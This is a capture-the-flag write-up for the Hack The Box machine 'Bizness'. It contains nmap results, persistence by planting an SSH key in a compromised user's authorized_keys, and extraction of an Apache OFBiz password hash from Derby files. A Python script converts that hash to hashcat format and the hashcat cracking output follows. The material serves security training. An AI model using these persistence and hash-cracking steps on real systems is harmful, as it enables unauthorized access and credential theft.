```
PORT      STATE SERVICE    REASON  VERSION
22/tcp    open  ssh        syn-ack OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
<<--snipped-->>
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOjcxHOO/Vs6yPUw6ibE6gvOuakAnmR7gTk/yE2yJA/3
80/tcp    open  http       syn-ack nginx 1.18.0
|_http-title: Did not follow redirect to https://bizness.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
443/tcp   open  ssl/http   syn-ack nginx 1.18.0
|_ssl-date: TLS randomness does not represent time
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| http-methods:
|_  Supported Methods: OPTIONS GET HEAD POST
| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Issuer: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=Some-State/countryName=UK
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-12-14T20:03:40
| Not valid after:  2328-11-10T20:03:40
| MD5:   b182:2fdb:92b0:2036:6b98:8850:b66e:da27
| SHA-1: 8138:8595:4343:f40f:937b:cc82:23af:9052:3f5d:eb50
| -----BEGIN CERTIFICATE-----
| MIIDbTCCAlWgAwIBAgIUcNuUwJFmLYEqrKfOdzHtcHum2IwwDQYJKoZIhvcNAQEL
<<--snipped-->>
| c1zAVUdnau5FQSAbwjDg0XqRrs1otS0YQhyMw/3D8X+f/vPDN9rFG8l9Q5wZLmCa
| zj1Tly1wsPCYAq9u570e22U=
|_-----END CERTIFICATE-----
| tls-alpn:
|_  http/1.1
|_http-server-header: nginx/1.18.0
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-favicon: Unknown favicon MD5: 7CF35F0B3566DB84C7260F0CC357D0B8
| tls-nextprotoneg:
|_  http/1.1
36197/tcp open  tcpwrapped syn-ack
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
I added an SSH key under the ofbiz user's $HOME directory to get a stable shell:
```bash
# on the target, as the ofbiz user
mkdir ~/.ssh
chmod 700 ~/.ssh
# generate the key pair on your own machine with: ssh-keygen -t rsa -b 2048
# then paste the contents of the resulting id_rsa.pub below
echo '<your public key>' > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
# done
```
Now simply SSH in as ofbiz with the matching private key:
```
➜  Apache-OFBiz-Authentication-Bypass git:(master) ssh ofbiz@bizness.htb
The authenticity of host 'bizness.htb (10.129.176.140)' can't be established.
ED25519 key fingerprint is SHA256:Yr2plP6C5tZyGiCNZeUYNDmsDGrfGijissa6WJo0yPY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bizness.htb' (ED25519) to the list of known hosts.
Linux bizness 5.10.0-26-amd64 #1 SMP Debian 5.10.197-1 (2023-09-29) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
ofbiz@bizness:~$ cat user.txt
b7c9d<--snipped-->b6a1997
ofbiz@bizness:~$
```
Root shell
So I tried linpeas.sh, but it didn't turn up much.
It flagged a Python capability, which turned out to be a rabbit hole.
(asked for a nudge)
The nudge was to look at how the application stores passwords.
Next I went looking for database files and found the derby directory; Apache Derby is the embedded database OFBiz uses by default.
I grepped the Derby data files for password material.
If you read the program, you'll see it hashes passwords with SHA-1 by default (I searched the source for "sha"):
program : https://github.com/apache/ofbiz/blob/trunk/framework/base/src/main/java/org/apache/ofbiz/base/crypto/HashCrypt.java
The same file shows that the digest is computed over the salt followed by the password and is stored URL-safe base64 encoded (without padding) as $SHA$salt$hash.
So URL-safe-base64-decode uP0_QaVBpDWFeo8-dRzDqRwXQ2I,
then convert the raw bytes to hex.
The salt is d (the middle field of the stored hash).
cyber chef url : https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9-_',true,false)To_Hex('None',0)&input=dVAwX1FhVkJwRFdGZW84LWRSekRxUndYUTJJ
Put the hex hash and the salt on one line in a file and give it to hashcat as mode 120 (sha1($salt.$pass)), in the form:
hash:salt
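The conversion above (URL-safe base64 decode, hex, append the salt) done in code, as an added example that is not part of the original writeup or of OFBiz. It mirrors the scheme visible in the linked HashCrypt.java: the stored value is $type$salt$b64 and the digest covers salt bytes followed by password bytes. The function names, the STORED_HASH constant (the hash discussed above) and the "hunter2" sample password are my own; the SHA-256 entry in the digest table is an assumption added so that non-SHA-1 hashes are rejected rather than mislabelled as mode 120.

```python
import base64
import hashlib
import hmac

# Constructed for this writeup: the stored OFBiz hash discussed above
# (type SHA, salt "d", URL-safe base64 digest without padding).
STORED_HASH = "$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"

# OFBiz hash type name -> hashlib constructor. "SHA" is the default the
# writeup hits; SHA-256 is included (assumption) only so it is rejected below.
_DIGESTS = {"SHA": hashlib.sha1, "SHA-1": hashlib.sha1, "SHA-256": hashlib.sha256}


def parse_ofbiz_hash(stored: str):
    """Split "$type$salt$b64" into (type, salt, raw digest bytes)."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("not an OFBiz $type$salt$hash string")
    _, htype, salt, b64 = parts
    if htype not in _DIGESTS:
        raise ValueError(f"unknown hash type {htype!r}")
    # The encoder strips '=' padding; put it back so Python will decode it.
    digest = base64.urlsafe_b64decode(b64 + "=" * (-len(b64) % 4))
    if len(digest) != _DIGESTS[htype]().digest_size:
        raise ValueError("digest length does not match hash type")
    return htype, salt, digest


def ofbiz_to_hashcat(stored: str) -> str:
    """Render the stored hash as a hashcat -m 120 (sha1($salt.$pass)) line: hexdigest:salt."""
    htype, salt, digest = parse_ofbiz_hash(stored)
    if _DIGESTS[htype] is not hashlib.sha1:
        raise ValueError(f"{htype} is not hashcat mode 120")
    return f"{digest.hex()}:{salt}"


def ofbiz_hash(password: str, salt: str, htype: str = "SHA") -> str:
    """Recreate HashCrypt-style output: digest(salt || password), URL-safe base64, no padding."""
    h = _DIGESTS[htype](salt.encode("utf-8"))
    h.update(password.encode("utf-8"))
    b64 = base64.urlsafe_b64encode(h.digest()).decode("ascii").rstrip("=")
    return f"${htype}${salt}${b64}"


def verify(stored: str, candidate: str) -> bool:
    """Check one candidate password against a stored hash (handy for confirming a hashcat result)."""
    htype, salt, digest = parse_ofbiz_hash(stored)
    h = _DIGESTS[htype](salt.encode("utf-8"))
    h.update(candidate.encode("utf-8"))
    return hmac.compare_digest(h.digest(), digest)


if __name__ == "__main__":
    # Prints the exact line that goes into the hashcat input file.
    print(ofbiz_to_hashcat(STORED_HASH))  # b8fd3f41a541a435857a8f3e751cc3a91c174362:d
```

Running the script prints the hash:salt line used with hashcat below; once hashcat returns a plaintext, verify(STORED_HASH, plaintext) confirms it without a second hashcat run.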
Hash crack
```
└─# hashcat -a 0 -m 120 bizness-hash.htb ../wordlists/rockyou.txt
hashcat (v6.2.6) starting
<<snip>>
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
<<snip>>
Dictionary cache built:
* Filename..: ../wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 0 secs

b8fd3f41a541a435857a8f3e751cc3a91c174362:d:<snip>

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 120 (sha1($salt.$pass))
Hash.Target......: b8fd3f41a541a435857a8f3e751cc3a91c174362:d
Time.Started.....: Sun Jan  7 14:28:17 2024 (0 secs)
<<snip>>
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: mosnarak -> meisgay1
Hardware.Mon.#1..: Util: 30%

Started: Sun Jan  7 14:27:59 2024
Stopped: Sun Jan  7 14:28:17 2024
```